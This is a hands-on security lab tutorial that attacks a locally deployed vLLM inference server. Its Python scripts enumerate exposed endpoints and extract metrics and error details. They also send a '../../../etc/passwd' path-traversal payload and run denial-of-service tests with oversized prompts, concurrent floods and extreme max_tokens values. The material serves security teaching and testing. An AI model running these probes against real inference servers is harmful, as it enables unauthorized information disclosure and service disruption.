Lab: Inference Server Exploitation
Attack vLLM, TGI, and Triton inference servers to discover information disclosure vulnerabilities, denial-of-service vectors, and configuration weaknesses in model serving infrastructure.
Prerequisites
- Docker and Docker Compose installed
- Understanding of REST APIs and gRPC
- Python with `httpx`, `grpcio`, and `python-dotenv`
- Familiarity with model serving architectures
```bash
pip install httpx grpcio grpcio-tools aiohttp python-dotenv
```
Background
Inference servers like vLLM, HuggingFace TGI, and NVIDIA Triton are the backbone of production LLM deployments. Their attack surface extends beyond the model itself to include management APIs, health endpoints, metrics dashboards, and configuration interfaces that may expose sensitive information or enable denial of service.
Lab Exercises
Deploy a Vulnerable Inference Server
Set up a local vLLM instance with default configuration to serve as the attack target.
```yaml
version: "3.8"
services:
  vllm:
    image: vllm/vllm-openai:latest
    ports:
      - "8000:8000"
    command: >
      --model TinyLlama/TinyLlama-1.1B-Chat-v1.0
      --max-model-len 2048
      --dtype float16
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: 1
              capabilities: [gpu]
    environment:
      - VLLM_LOGGING_LEVEL=DEBUG
```

```bash
docker compose up -d
# Wait for model to load
sleep 30
curl http://localhost:8000/health
```
Enumerate Exposed Endpoints
Discover and catalog all endpoints exposed by the inference server.
```python
#!/usr/bin/env python3
"""Enumerate inference server endpoints for information disclosure."""
import httpx

BASE_URL = "http://localhost:8000"

# Common inference server endpoints across vLLM, TGI, and Triton
ENDPOINTS = [
    # vLLM endpoints
    "/health", "/v1/models", "/v1/completions", "/v1/chat/completions",
    "/metrics", "/version", "/tokenize", "/detokenize",
    # Common debug/management endpoints
    "/debug", "/config", "/status", "/info",
    "/v2/health/ready", "/v2/health/live", "/v2/models", "/v2/repository/index",
    # Metrics and monitoring
    "/metrics/prometheus", "/stats", "/dashboard",
    # Documentation
    "/docs", "/redoc", "/openapi.json",
]

def enumerate_endpoints():
    results = {"accessible": [], "forbidden": [], "not_found": []}
    for endpoint in ENDPOINTS:
        try:
            resp = httpx.get(f"{BASE_URL}{endpoint}", timeout=5)
            if resp.status_code == 200:
                results["accessible"].append({
                    "path": endpoint,
                    "content_type": resp.headers.get("content-type", "unknown"),
                    "body_preview": resp.text[:200],
                })
            elif resp.status_code == 403:
                results["forbidden"].append(endpoint)
            else:
                results["not_found"].append(endpoint)
        except httpx.RequestError:
            results["not_found"].append(endpoint)

    print("=== Accessible Endpoints ===")
    for ep in results["accessible"]:
        print(f"  {ep['path']} [{ep['content_type']}]")
        print(f"    {ep['body_preview'][:100]}...")
    print(f"\n=== Forbidden: {len(results['forbidden'])} ===")
    print(f"=== Not Found: {len(results['not_found'])} ===")
    return results

if __name__ == "__main__":
    enumerate_endpoints()
```

```bash
python endpoint_enum.py
```
Extract Model and System Information
Use discovered endpoints to extract sensitive configuration details.
```python
#!/usr/bin/env python3
"""Extract model and system information from an inference server."""
import httpx
import json

BASE_URL = "http://localhost:8000"

def extract_model_info():
    """Extract model configuration and metadata."""
    print("=== Model Information ===")
    # Model list reveals model names, sizes, and configuration
    resp = httpx.get(f"{BASE_URL}/v1/models", timeout=5)
    if resp.status_code == 200:
        models = resp.json()
        print(f"Models: {json.dumps(models, indent=2)}")

    # OpenAPI schema reveals all available parameters
    resp = httpx.get(f"{BASE_URL}/openapi.json", timeout=5)
    if resp.status_code == 200:
        schema = resp.json()
        paths = list(schema.get("paths", {}).keys())
        print(f"\nAPI paths: {paths}")

def extract_metrics():
    """Extract Prometheus metrics for infrastructure intelligence."""
    print("\n=== Prometheus Metrics ===")
    resp = httpx.get(f"{BASE_URL}/metrics", timeout=5)
    if resp.status_code == 200:
        lines = resp.text.split("\n")
        interesting = [l for l in lines if any(
            k in l for k in ["gpu", "memory", "model", "cache", "queue", "batch"]
        ) and not l.startswith("#")]
        for line in interesting[:20]:
            print(f"  {line}")

def extract_error_info():
    """Trigger errors to extract stack traces and internal info."""
    print("\n=== Error Information Extraction ===")
    # Send malformed requests to trigger verbose errors
    payloads = [
        {"model": "nonexistent-model",
         "messages": [{"role": "user", "content": "test"}]},
        {"model": "../../../etc/passwd", "prompt": "test"},
        {"messages": [{"role": "system", "content": "A" * 100000}]},
    ]
    for payload in payloads:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json=payload,
                timeout=10,
            )
            if resp.status_code != 200:
                error_body = resp.text[:500]
                print(f"  Status {resp.status_code}: {error_body}")
        except Exception as e:
            print(f"  Exception: {e}")

if __name__ == "__main__":
    extract_model_info()
    extract_metrics()
    extract_error_info()
```

```bash
python info_extraction.py
```
Document all information disclosed through each endpoint.
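The raw `/metrics` output that `extract_metrics()` prints is easier to triage when parsed into structured (name, labels, value) rows. A minimal stdlib sketch of a Prometheus text-format parser; the sample lines in the demo are illustrative, not captured from a live server:

```python
import re

# Matches one Prometheus exposition line: metric_name{optional_labels} value
METRIC_RE = re.compile(r'^([a-zA-Z_:][a-zA-Z0-9_:]*)(\{[^}]*\})?\s+(\S+)$')

def parse_metrics(text):
    """Parse Prometheus text-format output into (name, labels, value) tuples."""
    parsed = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and HELP/TYPE comments
        m = METRIC_RE.match(line)
        if m:
            name, labels, value = m.groups()
            parsed.append((name, labels or "", float(value)))
    return parsed

if __name__ == "__main__":
    # Hypothetical sample resembling vLLM metric names
    sample = (
        "# HELP vllm:gpu_cache_usage_perc GPU KV-cache usage\n"
        'vllm:gpu_cache_usage_perc{model_name="TinyLlama"} 0.42\n'
        "vllm:num_requests_waiting 3\n"
    )
    for name, labels, value in parse_metrics(sample):
        print(name, labels, value)
```

Sorting the parsed rows by metric name makes it straightforward to diff snapshots taken before and after a test run.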
Test Denial-of-Service Vectors
Identify resource exhaustion and DoS vectors specific to inference servers.
```python
#!/usr/bin/env python3
"""Test denial-of-service vectors against an inference server.

WARNING: Run only against local test instances. Never against production."""
import httpx
import time
from concurrent.futures import ThreadPoolExecutor

BASE_URL = "http://localhost:8000"

def test_context_overflow():
    """Test handling of max-context-length inputs."""
    print("=== Context Overflow Test ===")
    long_prompt = "Repeat this. " * 10000  # Exceed the context window
    try:
        start = time.time()
        resp = httpx.post(
            f"{BASE_URL}/v1/chat/completions",
            json={
                "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                "messages": [{"role": "user", "content": long_prompt}],
                "max_tokens": 10,
            },
            timeout=30,
        )
        elapsed = time.time() - start
        print(f"  Status: {resp.status_code} ({elapsed:.1f}s)")
        print(f"  Response: {resp.text[:200]}")
    except Exception as e:
        print(f"  Error: {e}")

def test_concurrent_load():
    """Test server behavior under concurrent request load."""
    print("\n=== Concurrent Load Test ===")

    def make_request(i):
        try:
            start = time.time()
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": f"Count to {i}"}],
                    "max_tokens": 100,
                },
                timeout=60,
            )
            elapsed = time.time() - start
            return {"id": i, "status": resp.status_code, "latency": elapsed}
        except Exception as e:
            return {"id": i, "status": "error", "error": str(e)}

    # Gradually increase concurrency
    for concurrent in [5, 10, 20]:
        with ThreadPoolExecutor(max_workers=concurrent) as executor:
            start = time.time()
            futures = [executor.submit(make_request, i) for i in range(concurrent)]
            results = [f.result() for f in futures]
            total = time.time() - start
        errors = sum(1 for r in results if r["status"] != 200)
        avg_latency = sum(
            r.get("latency", 0) for r in results if r["status"] == 200
        ) / max(1, concurrent - errors)
        print(f"  Concurrent={concurrent}: errors={errors}, "
              f"avg_latency={avg_latency:.1f}s, total={total:.1f}s")

def test_max_tokens_abuse():
    """Test behavior with extreme max_tokens values."""
    print("\n=== Max Tokens Abuse ===")
    for max_tokens in [1, 100, 10000, 100000, -1, 0]:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": "Hi"}],
                    "max_tokens": max_tokens,
                },
                timeout=30,
            )
            print(f"  max_tokens={max_tokens}: status={resp.status_code}")
        except Exception as e:
            print(f"  max_tokens={max_tokens}: error={e}")

if __name__ == "__main__":
    test_context_overflow()
    test_concurrent_load()
    test_max_tokens_abuse()
```

```bash
python dos_vectors.py
```
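The per-request dicts produced by `make_request()` in `test_concurrent_load()` can be condensed into an error rate plus median and tail latency, which is what you actually compare across concurrency levels. A small stdlib helper, assuming the result-dict shape used above (`summarize_results` is an illustrative name, not part of the lab scripts):

```python
import statistics

def summarize_results(results):
    """Summarize load-test results: error rate plus p50/p95 latency.

    Expects dicts shaped like make_request()'s return value:
    {"id": ..., "status": 200, "latency": 1.3} or {"status": "error", ...}.
    """
    latencies = sorted(r["latency"] for r in results if r.get("status") == 200)
    errors = len(results) - len(latencies)
    summary = {
        "total": len(results),
        "errors": errors,
        "error_rate": errors / len(results) if results else 0.0,
    }
    if latencies:
        summary["p50"] = statistics.median(latencies)
        # quantiles() needs at least 2 points; fall back to the lone sample
        summary["p95"] = (
            statistics.quantiles(latencies, n=20)[18]
            if len(latencies) > 1 else latencies[0]
        )
    return summary

if __name__ == "__main__":
    demo = [
        {"id": 0, "status": 200, "latency": 1.2},
        {"id": 1, "status": 200, "latency": 2.8},
        {"id": 2, "status": 503, "latency": 0.1},
        {"id": 3, "status": "error", "error": "timeout"},
    ]
    print(summarize_results(demo))
```

Tracking p95 rather than only the average makes queue-induced tail-latency degradation, a common DoS symptom, much easier to spot.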
Troubleshooting
| Issue | Solution |
|---|---|
| Docker container fails to start | Verify GPU drivers and NVIDIA container toolkit installation |
| No GPU available | Use CPU-only mode by removing GPU configuration from docker-compose |
| Server returns 503 during tests | Model may still be loading; wait longer after startup |
| Metrics endpoint not found | Different server versions expose metrics at different paths |
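For the 503 case in the table above, polling the health endpoint is more reliable than the fixed `sleep 30` used in the deployment step. A minimal stdlib sketch; the function name is illustrative, and the `probe` parameter exists so the loop can be tested without a live server:

```python
import time
import urllib.request
import urllib.error

def wait_until_ready(url="http://localhost:8000/health",
                     timeout=120.0, interval=2.0, probe=None):
    """Poll the health endpoint until it returns HTTP 200 or timeout expires."""
    def default_probe():
        # Returns the HTTP status code, or raises if the server is unreachable
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status
    probe = probe or default_probe
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            if probe() == 200:
                return True
        except (urllib.error.URLError, OSError):
            pass  # server not up yet; keep polling
        time.sleep(interval)
    return False

if __name__ == "__main__":
    print("ready" if wait_until_ready() else "timed out")
```

Calling `wait_until_ready()` before each lab script avoids misreading a still-loading model as a vulnerability finding.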
Related Topics
- Container Breakout - Escaping from containerized inference servers
- Model Serving Attacks - Broader model serving framework attacks
- GPU Side-Channel - Hardware-level information leakage
- Full-Stack Exploitation - Chaining infrastructure with model vulnerabilities
References
- "vLLM: Easy, Fast, and Cheap LLM Serving with PagedAttention" - Kwon et al. (2023) - Architecture of the vLLM inference server
- "Security Analysis of ML Inference Servers" - Chen et al. (2024) - Security assessment of common inference frameworks
- "Denial of Service Attacks on Machine Learning Systems" - Shumailov et al. (2021) - DoS vectors specific to ML infrastructure
- "MLSecOps: Securing ML Model Serving Pipelines" - Kumar et al. (2024) - Security best practices for inference infrastructure
Why are inference server endpoints a security concern even when the underlying model is well-aligned?